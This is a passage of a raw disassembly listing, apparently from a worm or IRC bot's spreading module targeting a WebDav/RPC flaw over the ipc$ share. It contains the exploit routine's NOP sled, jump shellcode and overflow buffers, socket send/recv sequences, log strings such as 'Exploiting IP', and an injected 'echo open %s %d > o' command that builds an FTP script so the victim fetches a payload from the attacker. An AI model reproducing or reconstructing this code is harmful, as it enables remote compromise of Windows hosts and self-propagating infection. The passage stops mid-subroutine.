; ---------------------------------------------------------------------------
loc_415056: ; CODE XREF: .text:00415044�j
push ebx
push 4
xor eax, eax
mov ecx, 100h
mov edi, esi
rep stosd
mov eax, off_4310BC
push esi
push dword ptr [ebp-4]
mov dword ptr [eax], 54495551h
call dword_43A438 ; send
push dword ptr [ebp-4]
call dword_43A4B0 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-340h]
push 200h
push eax
call sub_416B5D
add esp, 14h
cmp [ebp+0BCh], ebx
jnz short loc_4150D3
push ebx
push dword ptr [ebp+0B8h]
lea eax, [ebp-340h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405D20
add esp, 14h
loc_4150D3: ; CODE XREF: .text:004150B4�j
lea eax, [ebp-340h]
push eax
call sub_401ECD
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
loc_4150F4: ; CODE XREF: .text:00415051�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4150F9 proc near ; CODE XREF: sub_415242+3F8�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_14], 2
call dword_43A414 ; inet_addr
mov [ebp+var_10], eax
xor eax, eax
mov ax, word_4319C0
push eax
call dword_43A4F4 ; ntohs
xor ebx, ebx
push ebx
push 1
push 2
mov [ebp+var_12], ax
call dword_43A39C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jnz short loc_415152
xor al, al
jmp loc_41523D
; ---------------------------------------------------------------------------
loc_415152: ; CODE XREF: sub_4150F9+50�j
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz loc_415232
push ebx
mov edi, 400h
push edi
lea eax, [ebp+var_5A4]
push eax
push esi
call dword_43A304 ; recv
push dword_439EE4
push [ebp+arg_0]
call sub_408852
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
mov esi, 190h
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_416B5D
lea eax, [ebp+var_1A4]
add esp, 14h
lea ecx, [eax+1]
loc_4151B0: ; CODE XREF: sub_4150F9+BC�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4151B0
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_415232
push 1F4h
call dword_422000 ; Sleep
push offset byte_42FD48
push offset aS_5 ; "%s\r\n"
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_416B5D
lea eax, [ebp+var_1A4]
add esp, 10h
lea edx, [eax+1]
loc_4151FE: ; CODE XREF: sub_4150F9+10A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4151FE
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_415232
push ebx
push edi
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call dword_43A304 ; recv
mov bl, 1
loc_415232: ; CODE XREF: sub_4150F9+69�j
; sub_4150F9+D5�j ...
push [ebp+var_4]
call dword_43A4B0 ; closesocket
mov al, bl
loc_41523D: ; CODE XREF: sub_4150F9+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_4150F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415242 proc near ; CODE XREF: .text:00415769�p
; .text:0041578B�p
var_81DC = byte ptr -81DCh
var_8174 = byte ptr -8174h
var_6104 = byte ptr -6104h
var_6094 = byte ptr -6094h
var_55D0 = byte ptr -55D0h
var_402C = byte ptr -402Ch
var_402B = byte ptr -402Bh
var_2F98 = byte ptr -2F98h
var_24D4 = byte ptr -24D4h
var_24D3 = byte ptr -24D3h
var_24D0 = byte ptr -24D0h
var_2454 = byte ptr -2454h
var_1C84 = byte ptr -1C84h
var_17D9 = byte ptr -17D9h
var_14EC = byte ptr -14ECh
var_EAC = byte ptr -0EACh
var_8D0 = byte ptr -8D0h
var_830 = byte ptr -830h
var_6C8 = dword ptr -6C8h
var_6B8 = byte ptr -6B8h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_384 = byte ptr -384h
var_124 = dword ptr -124h
var_114 = byte ptr -114h
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_AC = byte ptr -0ACh
var_A9 = byte ptr -0A9h
var_7F = byte ptr -7Fh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 81DCh
call sub_416B20
mov eax, dword_42BC3C
push ebx
mov [ebp+var_C], eax
mov eax, dword_42BC40
push esi
mov [ebp+var_8], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_34]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_416905
add esp, 0Ch
xor eax, eax
loc_415279: ; CODE XREF: sub_415242+4E�j
mov cl, [ebp+eax+var_34]
and [ebp+eax*2+var_FB], 0
mov [ebp+eax*2+var_FC], cl
inc eax
cmp eax, 28h
jl short loc_415279
push 18h
pop ecx
mov esi, offset dword_4315B8
lea edi, [ebp+var_AC]
lea eax, [ebp+var_34]
rep movsd
lea edx, [eax+1]
loc_4152A8: ; CODE XREF: sub_415242+6B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4152A8
sub eax, edx
mov ecx, eax
lea esi, [ebp+var_FC]
lea edi, [ebp+var_7C]
lea eax, [ebp+var_34]
rep movsw
lea ecx, [eax+1]
loc_4152C5: ; CODE XREF: sub_415242+88�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4152C5
sub eax, ecx
lea edi, [ebp+eax*2+var_7D]
mov esi, (offset aC_4+3)
movsd
movsd
lea eax, [ebp+var_34]
movsb
lea ecx, [eax+1]
loc_4152E0: ; CODE XREF: sub_415242+A3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4152E0
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
mov [ebp+var_A9], al
lea eax, [ebp+var_34]
lea ecx, [eax+1]
loc_4152FC: ; CODE XREF: sub_415242+BF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4152FC
sub eax, ecx
shl al, 1
add al, 9
mov [ebp+var_7F], al
xor eax, eax
mov ax, word_4319C0
push eax
call dword_43A4F4 ; ntohs
xor eax, 9999h
cmp [ebp+arg_C0], 0
mov word_4312B0, ax
mov eax, 90909090h
jz loc_41540E
mov ecx, 36Bh
lea edi, [ebp+var_EAC]
rep stosd
mov eax, [ebp+arg_C0]
imul eax, 3Ch
mov edx, dword_431A00[eax]
mov eax, offset loc_431200
mov ecx, eax
mov [ebp+var_6C8], edx
lea esi, [ecx+1]
loc_415364: ; CODE XREF: sub_415242+127�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_415364
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp+var_6B8]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov [ebp+var_394], 6EB06EBh
mov [ebp+var_390], edx
lea esi, [ecx+1]
loc_415398: ; CODE XREF: sub_415242+15B�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_415398
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_384]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_4153B9: ; CODE XREF: sub_415242+193�j
mov cl, [ebp+eax+var_EAC]
and [ebp+eax*2+var_402B], 0
mov [ebp+eax*2+var_402C], cl
inc eax
cmp eax, 0DACh
jl short loc_4153B9
and [ebp+var_24D4], 0
and [ebp+var_24D3], 0
mov edx, 714h
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_81DC]
rep stosd
stosw
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_6104]
rep stosd
stosw
jmp short loc_415475
; ---------------------------------------------------------------------------
loc_41540E: ; CODE XREF: sub_415242+F0�j
mov ecx, 1F4h
lea edi, [ebp+var_8D0]
rep stosd
mov eax, offset loc_431200
mov ecx, eax
lea esi, [ecx+1]
loc_415425: ; CODE XREF: sub_415242+1E8�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_415425
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_830]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_C]
rep movsb
lea ecx, [eax+1]
loc_41544A: ; CODE XREF: sub_415242+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41544A
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp+var_C]
lea edi, [ebp+var_114]
rep movsd
mov ecx, eax
mov eax, dword_431A00
and ecx, 3
rep movsb
mov [ebp+var_124], eax
loc_415475: ; CODE XREF: sub_415242+1CA�j
mov esi, [ebp+arg_BC]
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp+var_24D0]
rep stosd
stosb
movsx eax, [ebp+var_1]
push 0
add eax, 4
push eax
lea eax, [ebp+var_AC]
push eax
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4154B2
loc_4154AB: ; CODE XREF: sub_415242+29A�j
; sub_415242+2C1�j ...
xor al, al
jmp loc_41564A
; ---------------------------------------------------------------------------
loc_4154B2: ; CODE XREF: sub_415242+267�j
push 0
mov ebx, 640h
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43A304 ; recv
xor edi, edi
push edi
push 68h
push offset dword_431620
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4154AB
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43A304 ; recv
push edi
push 0A0h
push offset dword_431690
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4154AB
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_43A304 ; recv
cmp [ebp+arg_C0], edi
jz loc_4155C2
push 1Ah
pop ecx
mov esi, offset dword_431850
lea edi, [ebp+var_81DC]
rep movsd
mov ecx, 6D6h
lea esi, [ebp+var_402C]
lea edi, [ebp+var_8174]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_4318C0
lea edi, [ebp+var_6104]
rep movsd
mov ecx, 297h
lea esi, [ebp+var_2F98]
lea edi, [ebp+var_6094]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_431938
lea edi, [ebp+var_55D0]
rep movsd
xor esi, esi
push esi
push 10FCh
lea eax, [ebp+var_81DC]
push eax
push [ebp+arg_BC]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_4154AB
push esi
push ebx
lea eax, [ebp+var_14EC]
push eax
push [ebp+arg_BC]
call dword_43A304 ; recv
push esi
push 0FDCh
lea eax, [ebp+var_6104]
jmp short loc_415609
; ---------------------------------------------------------------------------
loc_4155C2: ; CODE XREF: sub_415242+2D9�j
push 1Fh
pop ecx
mov esi, offset dword_431738
lea edi, [ebp+var_24D0]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp+var_8D0]
lea edi, [ebp+var_2454]
rep movsd
pop ecx
mov esi, offset off_4317B8
lea edi, [ebp+var_1C84]
push 0
rep movsd
and [ebp+var_17D9], 0
push 0CF8h
lea eax, [ebp+var_24D0]
loc_415609: ; CODE XREF: sub_415242+37E�j
push eax
push [ebp+arg_BC]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_4154AB
push 12Ch
call dword_422000 ; Sleep
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_4150F9
add esp, 0BCh
test al, al
setnz al
loc_41564A: ; CODE XREF: sub_415242+26B�j
pop edi
pop esi
pop ebx
leave
retn
sub_415242 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp-14h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
xor esi, esi
push eax
mov [ebp-4], esi
mov word ptr [ebp-14h], 2
call dword_43A414 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call dword_43A4F4 ; ntohs
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_43A39C ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jz loc_41574B
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_43A34C ; connect
cmp eax, edi
jz loc_415744
push esi
push 89h
push offset dword_431398
push ebx
call dword_43A438 ; send
cmp eax, edi
jz short loc_415744
push esi
mov esi, 640h
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43A304 ; recv
push 0
push 0A8h
push offset dword_431428
push ebx
call dword_43A438 ; send
cmp eax, edi
jz short loc_415744
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43A304 ; recv
push 0
push 0DEh
push offset dword_4314D8
push ebx
call dword_43A438 ; send
cmp eax, edi
jz short loc_415744
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_43A304 ; recv
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_415756
dec eax
jz short loc_415752
loc_415744: ; CODE XREF: .text:004156B4�j
; .text:004156CE�j ...
push ebx
call dword_43A4B0 ; closesocket
loc_41574B: ; CODE XREF: .text:0041569F�j
xor eax, eax
jmp loc_415815
; ---------------------------------------------------------------------------
loc_415752: ; CODE XREF: .text:00415742�j
push 0
jmp short loc_41577A
; ---------------------------------------------------------------------------
loc_415756: ; CODE XREF: .text:0041573F�j
push 2
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_415242
add esp, 0C4h
test al, al
jnz short loc_41579A
push 1
loc_41577A: ; CODE XREF: .text:00415754�j
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_415242
add esp, 0C4h
test al, al
jz short loc_4157A1
loc_41579A: ; CODE XREF: .text:00415776�j
mov dword ptr [ebp-4], 1
loc_4157A1: ; CODE XREF: .text:00415798�j
push ebx
call dword_43A4B0 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_415812
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call sub_416B5D
push 0
push dword ptr [ebp+0B8h]
lea eax, [ebp-214h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405D20
lea eax, [ebp-214h]
push eax
call sub_401ECD
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
add esp, 2Ch
inc dword ptr [eax]
loc_415812: ; CODE XREF: .text:004157AC�j
xor eax, eax
inc eax
loc_415815: ; CODE XREF: .text:0041574D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 8590h
call sub_416B20
mov eax, dword_42BC3C
push ebx
push esi
mov [ebp-0Ch], eax
mov eax, dword_42BC40
push edi
mov [ebp-8], eax
lea eax, [ebp+0Ch]
push 1
push eax
call sub_403FEB
test eax, eax
pop ecx
pop ecx
jz loc_415E0B
cmp eax, 1
jz loc_415E0B
cmp eax, 3
jnz short loc_415863
and dword ptr [ebp-10h], 0
jmp short loc_415877
; ---------------------------------------------------------------------------
loc_415863: ; CODE XREF: .text:0041585B�j
call sub_41699A
push 0Ah
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
inc edx
inc edx
mov [ebp-10h], edx
loc_415877: ; CODE XREF: .text:00415861�j
lea eax, [ebp+0Ch]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp-58h]
push 28h
push eax
call sub_416B5D
add esp, 10h
xor eax, eax
loc_415890: ; CODE XREF: .text:004158A7�j
mov cl, [ebp+eax-58h]
and byte ptr [ebp+eax*2-11Fh], 0
mov [ebp+eax*2-120h], cl
inc eax
cmp eax, 28h
jl short loc_415890
push 18h
pop ecx
mov esi, offset dword_431E70
lea edi, [ebp-0D0h]
lea eax, [ebp-58h]
rep movsd
lea edx, [eax+1]
loc_4158BF: ; CODE XREF: .text:004158C4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4158BF
sub eax, edx
mov ecx, eax
lea esi, [ebp-120h]
lea edi, [ebp-0A0h]
lea eax, [ebp-58h]
rep movsw
lea ecx, [eax+1]
loc_4158DF: ; CODE XREF: .text:004158E4�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4158DF
sub eax, ecx
lea edi, [ebp+eax*2-0A1h]
mov esi, (offset aC_5+3)
movsd
movsd
lea eax, [ebp-58h]
movsb
lea ecx, [eax+1]
loc_4158FD: ; CODE XREF: .text:00415902�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4158FD
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp-1], al
mov [ebp-0CDh], al
lea eax, [ebp-58h]
lea ecx, [eax+1]
loc_415919: ; CODE XREF: .text:0041591E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_415919
sub eax, ecx
shl al, 1
add al, 9
push 135h
mov [ebp-0A3h], al
call dword_43A4F4 ; ntohs
mov ebx, [ebp-10h]
xor eax, 9999h
cmp ebx, 1
mov word_431B68, ax
jz short loc_4159C4
cmp ebx, 2
jz short loc_4159C4
mov eax, 90909090h
mov ecx, 1F4h
lea edi, [ebp-12C4h]
rep stosd
mov eax, offset loc_431AB8
mov ecx, eax
lea esi, [ecx+1]
loc_41596B: ; CODE XREF: .text:00415970�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_41596B
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-1224h]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-0Ch]
rep movsb
lea ecx, [eax+1]
loc_415990: ; CODE XREF: .text:00415995�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_415990
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp-0Ch]
lea edi, [ebp-0B08h]
rep movsd
mov ecx, eax
and ecx, 3
imul ebx, 3Ch
mov eax, dword_4322B0[ebx]
rep movsb
mov [ebp-0B18h], eax
jmp loc_415A96
; ---------------------------------------------------------------------------
loc_4159C4: ; CODE XREF: .text:00415948�j
; .text:0041594D�j
imul ebx, 3Ch
mov edx, dword_4322B0[ebx]
mov eax, 90909090h
mov ecx, 36Bh
lea edi, [ebp-18A0h]
rep stosd
mov eax, offset loc_431AB8
mov ecx, eax
mov [ebp-10BCh], edx
lea esi, [ecx+1]
loc_4159EF: ; CODE XREF: .text:004159F4�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4159EF
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp-10ACh]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov dword ptr [ebp-0D88h], 6EB06EBh
mov [ebp-0D84h], edx
lea esi, [ecx+1]
loc_415A23: ; CODE XREF: .text:00415A28�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_415A23
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-0D78h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_415A44: ; CODE XREF: .text:00415A60�j
mov cl, [ebp+eax-18A0h]
and byte ptr [ebp+eax*2-43DFh], 0
mov [ebp+eax*2-43E0h], cl
inc eax
cmp eax, 0DACh
jl short loc_415A44
and byte ptr [ebp-2888h], 0
and byte ptr [ebp-2887h], 0
mov edx, 714h
mov esi, 31313131h
mov ecx, edx
mov eax, esi
lea edi, [ebp-8590h]
rep stosd
stosw
mov ecx, edx
mov eax, esi
lea edi, [ebp-64B8h]
rep stosd
stosw
loc_415A96: ; CODE XREF: .text:004159BF�j
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp-2884h]
rep stosd
xor ebx, ebx
push ebx
push 1
push 2
stosb
call dword_43A39C ; socket
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jz loc_415E0D
push dword ptr [ebp+0A8h]
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-30h], 2
call dword_43A4F4 ; ntohs
mov [ebp-2Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A414 ; inet_addr
mov [ebp-2Ch], eax
push 10h
lea eax, [ebp-30h]
push eax
push esi
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz loc_415E04
push ebx
push 89h
push offset dword_431C50
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E04
push ebx
mov ebx, 640h
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
xor edi, edi
push edi
push 0A8h
push offset dword_431CE0
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E04
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
push edi
push 0DEh
push offset dword_431D90
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E04
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
movsx eax, byte ptr [ebp-1]
push edi
add eax, 4
push eax
lea eax, [ebp-0D0h]
push eax
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E04
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
push edi
push 68h
push offset dword_431ED8
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E04
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
push edi
push 0A0h
push offset dword_431F48
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E04
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
cmp dword ptr [ebp-10h], 1
jz short loc_415C7F
cmp dword ptr [ebp-10h], 2
jz short loc_415C7F
push 1Fh
pop ecx
mov esi, offset dword_431FF0
lea edi, [ebp-2884h]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp-12C4h]
lea edi, [ebp-2808h]
rep movsd
pop ecx
push 0
push 0CF8h
lea eax, [ebp-2884h]
mov esi, offset off_432070
lea edi, [ebp-2038h]
push eax
push dword ptr [ebp-8]
rep movsd
and byte ptr [ebp-1B8Dh], 0
loc_415C68: ; CODE XREF: .text:00415D19�j
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz loc_415D1E
loc_415C77: ; CODE XREF: .text:00415D42�j
push dword ptr [ebp-8]
jmp loc_415E05
; ---------------------------------------------------------------------------
loc_415C7F: ; CODE XREF: .text:00415C15�j
; .text:00415C1B�j
push 1Ah
pop ecx
mov esi, offset dword_432108
lea edi, [ebp-8590h]
rep movsd
mov ecx, 6D6h
lea esi, [ebp-43E0h]
lea edi, [ebp-8528h]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_432178
lea edi, [ebp-64B8h]
rep movsd
mov ecx, 297h
lea esi, [ebp-334Ch]
lea edi, [ebp-6448h]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_4321F0
lea edi, [ebp-5984h]
rep movsd
mov esi, [ebp-8]
xor edi, edi
push edi
push 10FCh
lea eax, [ebp-8590h]
push eax
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jz loc_415E04
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
push edi
push 0FDCh
lea eax, [ebp-64B8h]
push eax
push esi
jmp loc_415C68
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: .text:00415C71�j
push 0
push ebx
lea eax, [ebp-0AF0h]
push eax
push dword ptr [ebp-8]
call dword_43A304 ; recv
push 6
push 1
push 2
call dword_43A39C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_415C77
xor eax, eax
lea edi, [ebp-20h]
stosd
stosd
stosd
stosd
push 135h
mov word ptr [ebp-20h], 2
call dword_43A4F4 ; ntohs
mov [ebp-1Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A414 ; inet_addr
mov [ebp-1Ch], eax
push 10h
lea eax, [ebp-20h]
push eax
push esi
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_415D8A
push dword ptr [ebp-8]
jmp short loc_415DFE
; ---------------------------------------------------------------------------
loc_415D8A: ; CODE XREF: .text:00415D83�j
xor edi, edi
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_43A304 ; recv
test eax, eax
jle short loc_415E0B
push 1F4h
call dword_422000 ; Sleep
push dword_439EE4
push dword ptr [ebp+8]
call sub_408852
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-2B0h]
push 190h
push eax
call sub_416B5D
lea eax, [ebp-2B0h]
add esp, 14h
lea edx, [eax+1]
loc_415DDD: ; CODE XREF: .text:00415DE2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_415DDD
push edi
sub eax, edx
push eax
lea eax, [ebp-2B0h]
push eax
push esi
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_415E12
loc_415DFE: ; CODE XREF: .text:00415D88�j
call dword_43A4B0 ; closesocket
loc_415E04: ; CODE XREF: .text:00415B00�j
; .text:00415B1B�j ...
push esi
loc_415E05: ; CODE XREF: .text:00415C7A�j
call dword_43A4B0 ; closesocket
loc_415E0B: ; CODE XREF: .text:00415849�j
; .text:00415852�j ...
xor eax, eax
loc_415E0D: ; CODE XREF: .text:00415AC0�j
; .text:00415E91�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_415E12: ; CODE XREF: .text:00415DFC�j
call dword_43A4B0 ; closesocket
push esi
call dword_43A4B0 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSTryingSploitI ; "[%s]: Trying Sploit IP: %s."
lea eax, [ebp-4B0h]
push 200h
push eax
call sub_416B5D
add esp, 14h
cmp [ebp+0BCh], edi
jnz short loc_415E70
push edi
push dword ptr [ebp+0B8h]
lea eax, [ebp-4B0h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405D20
add esp, 14h
loc_415E70: ; CODE XREF: .text:00415E51�j
lea eax, [ebp-4B0h]
push eax
call sub_401ECD
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp loc_415E0D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E96 proc near ; CODE XREF: sub_41610F+37�p
var_6F0 = byte ptr -6F0h
var_4E8 = byte ptr -4E8h
var_2E8 = byte ptr -2E8h
var_15D = byte ptr -15Dh
var_158 = byte ptr -158h
var_54 = byte ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_20 = byte ptr 28h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
sub esp, 6F0h
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
push 8
pop ecx
xor ebx, ebx
push ebx
push [ebp+arg_0]
xor eax, eax
push [ebp+arg_4]
lea edi, [ebp+var_54]
rep stosd
lea eax, [ebp+var_54]
push eax
mov [ebp+var_40], esi
mov [ebp+var_50], 1
mov [ebp+var_44], ebx
mov [ebp+var_38], ebx
call dword_43A444
test eax, eax
jz short loc_415EE3
push 0Ah
call dword_422000 ; Sleep
jmp loc_4160FB
; ---------------------------------------------------------------------------
loc_415EE3: ; CODE XREF: sub_415E96+3E�j
push 190h
